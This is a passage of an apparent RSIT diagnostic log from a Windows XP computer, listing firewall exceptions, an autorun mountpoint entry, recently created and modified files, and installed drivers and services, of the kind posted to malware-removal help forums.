"C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe:LocalSubNet:Disabled:PMCService"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}]
shell\AutoRun\command - J:\setup.exe AUTORUN=1


======List of files/folders created in the last 1 months======

2009-05-29 12:37:36 ----A---- C:\WINDOWS\system32\h323log.txt
2009-05-29 12:33:50 ----A---- C:\WINDOWS\system32\hidserv.dll
2009-05-29 12:33:22 ----A---- C:\WINDOWS\system32\ksuser.dll
2009-05-29 12:32:09 ----A---- C:\WINDOWS\system32\usbui.dll
2009-05-29 12:31:03 ----SHD---- C:\WINDOWS\Installer
2009-05-29 12:31:03 ----D---- C:\Program Files\Common Files\ODBC
2009-05-29 12:31:03 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-05-29 12:31:03 ----A---- C:\WINDOWS\ODBCINST.INI
2009-05-29 12:30:57 ----D---- C:\Program Files\Common Files\SpeechEngines
2009-05-29 12:30:56 ----RD---- C:\Program Files
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuq.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuf.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdazel.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbduzb.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdtat.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdmon.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkyr.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkaz.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdaze.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdycc.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdur.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru1.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdbu.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdblr.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhept.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela3.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela2.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe319.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe220.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdgkl.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlv1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdlv.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdest.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl1.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdycl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdro.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz2.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcr.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\KBDAL.DLL
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\irclass.dll
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\dgrpsetu.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\spxcoins.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\EqnClass.Dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\dgsetup.dll
2009-05-29 12:30:28 ----N---- C:\WINDOWS\system32\CONFIG.TMP
2009-05-29 12:30:28 ----A---- C:\WINDOWS\TASKMAN.EXE
2009-05-29 12:30:27 ----A---- C:\WINDOWS\system32\batt.dll
2009-05-29 12:30:27 ----A---- C:\WINDOWS\notepad.exe
2009-05-29 12:30:26 ----A---- C:\WINDOWS\system32\storprop.dll
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3D.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3C.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3B.tmp
2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\All Users\Application Data\desktop.ini
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET3A.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET39.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET38.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET37.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET36.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET35.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET34.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET33.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET32.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET31.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET30.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2F.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2E.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2D.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2C.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2B.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2A.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET29.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET28.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET27.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET26.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET25.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET24.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET23.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET22.tmp
2009-05-29 12:30:15 ----RA---- C:\WINDOWS\SET21.tmp
2009-05-29 12:30:12 ----RA---- C:\WINDOWS\SET8.tmp
2009-05-29 12:30:08 ----RA---- C:\WINDOWS\SET4.tmp
2009-05-29 12:30:07 ----RA---- C:\WINDOWS\SET3.tmp
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot2
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot
2009-05-29 12:29:57 ----SD---- C:\Documents and Settings\All Users\Application Data\Microsoft
2009-05-29 12:29:24 ----D---- C:\Documents and Settings
2009-05-29 12:28:33 ----SHD---- C:\System Volume Information
2009-05-29 12:28:33 ----SH---- C:\boot.ini
2009-05-29 12:18:18 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-05-29 12:18:18 ----RSD---- C:\WINDOWS\Fonts
2009-05-29 12:18:18 ----RD---- C:\WINDOWS\Web
2009-05-29 12:18:18 ----HD---- C:\WINDOWS\inf
2009-05-29 12:18:18 ----D---- C:\WINDOWS\WinSxS
2009-05-29 12:18:18 ----D---- C:\WINDOWS\twain_32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wins
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wbem
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\usmt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\spool
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ShellExt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\Setup
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ras
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\oobe
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\npp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\inetsrv
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\IME
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\icsxml
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ias
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\export
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\drivers
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\dhcp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3com_dmi
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3076
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\2052
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1054
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1042
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1041
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1038
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1037
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1033
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1031
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1028
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1025
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system
2009-05-29 12:18:18 ----D---- C:\WINDOWS\security
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Resources
2009-05-29 12:18:18 ----D---- C:\WINDOWS\repair
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Provisioning
2009-05-29 12:18:18 ----D---- C:\WINDOWS\PeerNet
2009-05-29 12:18:18 ----D---- C:\WINDOWS\pchealth
2009-05-29 12:18:18 ----D---- C:\WINDOWS\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msapps
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msagent
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Media
2009-05-29 12:18:18 ----D---- C:\WINDOWS\java
2009-05-29 12:18:18 ----D---- C:\WINDOWS\ime
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Help
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Driver Cache
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Debug
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Cursors
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Connection Wizard
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\AppPatch
2009-05-29 12:18:18 ----D---- C:\WINDOWS\addins
2009-05-29 12:18:18 ----D---- C:\WINDOWS
2009-05-23 14:29:10 ----D---- C:\rsit
2009-05-23 14:29:10 ----D---- C:\Program Files\trend micro
2009-05-23 14:22:38 ----A---- C:\link.txt
2009-05-23 11:46:55 ----A---- C:\WINDOWS\ntbtlog.txt
2009-05-22 20:51:55 ----A---- C:\WINDOWS\imsins.BAK
2009-05-22 20:41:54 ----D---- C:\Program Files\NT Registry Optimizer
2009-05-22 20:40:02 ----SHD---- C:\RECYCLER
2009-05-22 20:35:17 ----SD---- C:\ComboFix
2009-05-22 18:15:45 ----D---- C:\WINDOWS\temp
2009-05-20 21:23:49 ----D---- C:\Program Files\HijackThis
2009-05-19 17:04:37 ----D---- C:\Program Files\NCH Software
2009-05-19 16:42:24 ----D---- C:\Documents and Settings\Zsombor\Application Data\NCH Swift Sound
2009-05-19 16:08:49 ----D---- C:\Program Files\NCH Swift Sound
2009-05-14 14:09:58 ----D---- C:\Program Files\Microsoft Virtual PC
2009-05-10 20:18:00 ----A---- C:\WINDOWS\system32\PY_Uninstal.exe
2009-05-05 00:31:21 ----D---- C:\Program Files\webcamXP
2009-05-05 00:30:05 ----D---- C:\Documents and Settings\All Users\Application Data\WebacamSurveyor
2009-05-05 00:29:44 ----D---- C:\Program Files\Webcam Surveyor
2009-05-05 00:14:18 ----A---- C:\WINDOWS\system32\wmvdmoe.dll
2009-05-05 00:14:13 ----D---- C:\Documents and Settings\All Users\Application Data\PY_Software
2009-05-05 00:13:52 ----D---- C:\Program Files\Active WebCam
2009-05-04 12:21:22 ----D---- C:\Program Files\Noel Danjou
2009-04-27 19:50:53 ----N---- C:\WINDOWS\NuNinst.exe
2009-04-27 19:50:51 ----D---- C:\WINDOWS\InCD
2009-04-24 19:12:43 ----A---- C:\WINDOWS\myip.ini
2009-04-24 19:03:11 ----D---- C:\Program Files\KeyFocus

======List of files/folders modified in the last 1 months======

2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\Zsombor\Application Data\desktop.ini
2009-05-23 14:29:22 ----D---- C:\WINDOWS\Internet Logs
2009-05-23 14:25:44 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-05-23 14:24:13 ----D---- C:\WINDOWS\Prefetch
2009-05-23 14:24:01 ----A---- C:\WINDOWS\wincmd.ini
2009-05-23 14:15:54 ----D---- C:\Program Files\Opera
2009-05-23 13:55:42 ----A---- C:\WINDOWS\wcx_ftp.ini
2009-05-23 10:38:30 ----D---- C:\Documents and Settings\Zsombor\Application Data\LimeWire
2009-05-22 23:29:02 ----A---- C:\WINDOWS\win.ini
2009-05-22 20:43:32 ----D---- C:\WINDOWS\system32\LogFiles
2009-05-22 20:36:39 ----D---- C:\WINDOWS\system32\Restore
2009-05-22 20:11:45 ----D---- C:\Program Files\Windows Media Player
2009-05-22 20:11:43 ----D---- C:\WINDOWS\RegisteredPackages
2009-05-22 19:54:10 ----A---- C:\checkrun.txt
2009-05-22 18:21:27 ----A---- C:\WINDOWS\system.ini
2009-05-20 21:16:59 ----HD---- C:\Config.Msi
2009-05-20 21:11:02 ----D---- C:\Program Files\Adobe
2009-05-20 20:50:53 ----D---- C:\Program Files\Common Files\Adobe
2009-05-19 21:06:37 ----D---- C:\Documents and Settings\All Users\Application Data\FLEXnet
2009-05-19 18:04:20 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-05-17 19:01:01 ----D---- C:\WINDOWS\Minidump
2009-05-14 21:30:30 ----D---- C:\WINDOWS\Registration
2009-05-14 20:15:13 ----A---- C:\WINDOWS\NeroDigital.ini
2009-05-08 22:01:34 ----A---- C:\WINDOWS\system32\DivXEncSettings.txt
2009-04-28 21:43:12 ----D---- C:\Program Files\uTorrent
2009-04-27 22:07:00 ----SD---- C:\WINDOWS\Tasks
2009-04-27 19:50:51 ----D---- C:\Program Files\Ahead

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 easdrv;easdrv; C:\WINDOWS\system32\DRIVERS\easdrv.sys [2008-10-24 53256]
R1 epfwtdir;epfwtdir; C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-10-24 34824]
R1 InCDPass;InCDPass; C:\WINDOWS\System32\DRIVERS\InCDPass.sys [2004-02-10 27408]
R1 intelppm;Intel processzor illesztőprogramja; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 40576]
R1 kbdhid;Billentyűzet HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14720]
R1 vmm;Virtual Machine Monitor; \??\C:\WINDOWS\system32\Drivers\vmm.sys []
R1 vsdatant;vsdatant; C:\WINDOWS\System32\vsdatant.sys [2008-08-21 353680]
R2 DLPortIO;DriverLINX Port I/O Driver; \??\C:\WINDOWS\system32\DRIVERS\DLPortIO.SYS []
R2 eamon;EAMON; C:\WINDOWS\system32\DRIVERS\eamon.sys [2008-10-24 39944]
R2 TVicPort;TVICPORT; \??\C:\WINDOWS\system32\DRIVERS\TVICPORT.SYS []
R3 ASAPIW2k;ASAPIW2K; C:\WINDOWS\system32\drivers\ASAPIW2k.sys [2005-05-26 11264]
R3 BthEnum;Bluetooth kérési blokk illesztőprogramja; C:\WINDOWS\system32\DRIVERS\BthEnum.sys [2008-04-13 17024]
R3 BthPan;Bluetooth Device (Personal Area Network); C:\WINDOWS\system32\DRIVERS\bthpan.sys [2008-04-13 101120]
R3 BTHUSB;Bluetooth-rádió USB illesztőprogramja; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2008-04-13 18944]
R3 DCamUSBEMPIA;PCTV USB2 2821 Capture; C:\WINDOWS\system32\DRIVERS\emDevice.sys [2004-04-06 100957]
R3 emAudio;PCTV USB2 2821 Audio; C:\WINDOWS\system32\drivers\emAudio.sys [2004-05-05 19584]
R3 FETND5BV;VIA Rhine-Family Fast Ethernet Adapter Driver Service; C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2005-11-16 42496]
R3 FiltUSBEMPIA;USB Device Lower Filter; C:\WINDOWS\system32\DRIVERS\emFilter.sys [2004-04-06 5245]
R3 HDAudBus;Microsoft UAA busz-illesztőprogram - High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 hidusb;Microsoft HID osztályú illesztőprogram; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2006-06-28 4304384]
R3 LVUSBSta;Logitech USB Monitor Filter; C:\WINDOWS\system32\drivers\lvusbsta.sys [2005-01-31 22016]
R3 mouhid;Egér HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-18 12160]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-12-03 6209536]
R3 pepifilter;Volume Adapter; C:\WINDOWS\system32\DRIVERS\lv302af.sys [2005-01-31 7104]
R3 PID_08A0;QuickCam IM(PID_08A0); C:\WINDOWS\system32\DRIVERS\LV302AV.SYS [2005-01-31 912768]
R3 RFCOMM;Bluetooth-eszköz (RFCOMM protokoll TDI); C:\WINDOWS\system32\DRIVERS\rfcomm.sys [2008-04-13 59136]
R3 ScanUSBEMPIA;USB Still Image Capture Device; C:\WINDOWS\system32\DRIVERS\emScan.sys [2004-04-06 4493]
R3 SNXPCARD;Sunix PCI Multi I/O Card Driver; C:\WINDOWS\system32\DRIVERS\snxpcard.sys [2003-04-03 20864]
R3 SNXPPALX;Sunix PCI Parallel Port Driver; C:\WINDOWS\system32\DRIVERS\snxppalx.sys [2003-04-07 75264]
R3 StillCam;Still Serial digitális fényképezőgép illesztőprogramja; C:\WINDOWS\system32\DRIVERS\serscan.sys [2001-10-26 6912]
R3 usbaudio;USB audio-illesztőprogram (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
R3 usbccgp;Microsoft USB általános szülő-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
R3 usbehci;Microsoft USB 2.0 bővített állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Microsoft USB szabványos hub-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbstor;USB háttértár illesztőprogramja; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
R3 usbuhci;Microsoft USB univerzális állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
R3 VPCNetS2;Virtual Machine Network Services Driver; C:\WINDOWS\system32\DRIVERS\VMNetSrv.sys [2007-01-29 59280]
R4 InCDfs;InCD File System; C:\WINDOWS\system32\drivers\InCDfs.sys [2004-02-10 94320]
S3 a6lsws87;a6lsws87; C:\WINDOWS\system32\drivers\a6lsws87.sys []
S3 Arp1394;1394 ARP ügyfélprotokoll; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
S3 BTHMODEM;Bluetooth-modem kommunikációs illesztőprogramja; C:\WINDOWS\system32\DRIVERS\bthmodem.sys [2008-04-13 37888]
S3 BTHPORT;Bluetooth-portillesztőprogram; C:\WINDOWS\System32\Drivers\BTHport.sys [2008-04-14 273408]
S3 CCDECODE;Feliratdekódoló; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
S3 FETNDIS;VIA PCI 10/100Mb Fast Ethernet adapter NT-illesztőprogramja; C:\WINDOWS\system32\DRIVERS\fetnd5.sys [2001-08-17 27165]
S3 ggflt;SEMC USB Flash Driver Filter; C:\WINDOWS\system32\DRIVERS\ggflt.sys [2009-03-01 13224]
S3 ggsemc;SEMC USB Flash Driver; C:\WINDOWS\system32\DRIVERS\ggsemc.sys [2009-03-01 24616]
S3 GT72NDISIPXP;GT 72 IP NDIS; C:\WINDOWS\system32\DRIVERS\Gt51Ip.sys [2007-07-09 95744]
S3 GT72UBUS;GT 72 U BUS; C:\WINDOWS\system32\DRIVERS\gt72ubus.sys [2007-06-26 51968]
S3 GTPTSER;GT PT SER; C:\WINDOWS\system32\DRIVERS\gtptser.sys [2007-03-30 8064]
S3 HidBth;Microsoft Bluetooth HID miniport; C:\WINDOWS\system32\DRIVERS\hidbth.sys [2008-04-14 25728]
S3 MSTEE;Microsoft Streaming Tee/Sink - Sink átalakító; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
S3 NABTSFEC;NABTS/FEC VBI kodek; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
S3 NdisIP;Microsoft TV-/videokapcsolat; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
S3 NIC1394;1394 hálózati illesztőprogram; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
S3 se45bus;Sony Ericsson Device 069 driver (WDM); C:\WINDOWS\system32\DRIVERS\se45bus.sys [2006-11-30 61536]
S3 Ser2pl;Prolific Serial port driver; C:\WINDOWS\system32\DRIVERS\ser2pl.sys [2003-07-16 43264]
S3 SIS163u;SiS163 usb Wireless LAN Adapter Driver; C:\WINDOWS\system32\DRIVERS\sis163u.sys [2005-06-20 215040]
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
S3 usbprint;Microsoft USB PRINTER osztály; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 Wdf01000;Kernel Mode Driver Frameworks service; C:\WINDOWS\System32\Drivers\wdf01000.sys [2008-03-27 503008]
S3 WSTCODEC;World Standard Teletext kodek; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-28 82944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 BthServ;Bluetooth Support Service; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
R2 ekrn;Eset Service; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2008-10-24 468224]
R2 GtDetectSc;GtDetectSc; C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe [2007-11-05 204915]
R2 InCDsrv;InCD Helper; C:\Program Files\Ahead\InCD\InCDsrv.exe [2004-02-10 847978]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-01-13 152984]
R2 KeyFocusWebServer;KF Web Server; C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe [2002-06-15 745472]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-12-03 163908]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2006-03-03 69632]
R2 PnkBstrA;PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [2009-02-08 66872]
R2 TestHandler;Fujitsu Siemens Computers Diagnostic Testhandler; C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe [2008-04-25 303104]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R2 vsmon;TrueVector Internet Monitor; C:\WINDOWS\system32\ZoneLabs\vsmon.exe [2008-08-21 2405776]
R3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; c:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
R3 usnjsvc;Messenger megosztási mappák – USN-naplóolvasó szolgáltatás; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2005-09-23 29896]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2005-09-23 66240]
S3 EhttpSrv;Eset HTTP Server; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [2008-10-24 19200]
S3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-05-19 655624]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
S3 MSCSPTISRV;MSCSPTISRV; C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe [2006-12-14 45056]
S3 MSSQL$PINNACLESYS;MSSQL$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe [2005-05-04 9150464]
S3 MSSQLServerADHelper;MSSQLServerADHelper; C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe [2005-05-03 73728]
S3 PACSPTISVR;PACSPTISVR; C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe [2006-12-14 57344]
S3 PinnacleSys.MediaServer;Pinnacle Systems Media Service; C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe [2006-01-19 49152]
S3 SerialKeys;SerialKeys; C:\WINDOWS\system32\skeys.exe [2008-04-14 26112]
S3 SonicStage Back-End Service;SonicStage Back-End Service; C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe [2007-02-05 112184]
S3 SPTISRV;Sony SPTI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe [2006-12-14 69632]
S3 SQLAgent$PINNACLESYS;SQLAgent$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlagent.EXE [2005-05-03 323584]
S3 SSScsiSV;SonicStage SCSI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe [2007-02-05 75320]
S3 WLSetupSvc;Windows Live Setup Service; C:\Program Files\Windows Live\installer\WLSetupSvc.exe [2007-10-25 266240]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
